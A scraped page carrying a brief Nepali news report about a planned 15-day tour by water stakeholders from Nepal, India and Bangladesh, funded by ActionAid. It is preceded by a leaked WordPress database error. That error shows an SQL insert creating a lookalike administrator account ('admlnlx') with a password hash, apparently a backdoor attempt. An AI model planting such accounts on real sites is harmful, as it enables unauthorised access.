WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVYt5XF3gTSR0jNM7Fm0MC/vAPtPnR1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 13:47:01', '', 'admlnlx', 'admlnlx')
नवलपरासी, माघ १६–
नेपाल, भारत र बङ्गलादेशमा जलको वास्तविक अवस्था बुझ्न भ्रमण टोली जाने भएको छ ।
तीनै देशका प्रतिनिधिहरु सहभागी हुने टोलीले तीनै देशमा जलको वास्तविक अवस्था, जल अधिकारको अवस्था, एक देशले अर्को देशलाई गर्न सक्ने जलसम्बन्धी सहयोगबारे छलफल गर्नेछन् ।
आगामी फागुन ५ गतेदेखि नेपालबाट जाने भ्रमण टोलीमा नेपाल, भारत र बङ्गलादेश पाँच, पाँच गरी तीनै देशका पानीसँग सम्बन्धित १५ सरोकारवालाको सहभागिता हुनेछ ।
करिब १५ दिनसम्म तीनै देशमा पुगी टोलीले एक अर्काको देशको जल अवस्थाबारे छलफल गर्ने भ्रमण टोलीमा सहभागी हुने गण्डक नदी नियन्त्रण सङ्घर्ष समिति, नवलपरासीका सचिव दूधनाथ गुप्ताले जानकारी दिनुभयो ।
सो टोलीमा प्रत्येक देशबाट एक एकजना एक्सन एडका प्रतिनिधि, जलको क्षेत्रमा काम गर्ने निकायबाट एकजना र अन्य तीन तीनजना जल अभियानकर्मी रहने छन् । सो भ्रमणका लागि एक्सन एडले आर्थिक सहयोग गरेको छ । –रासस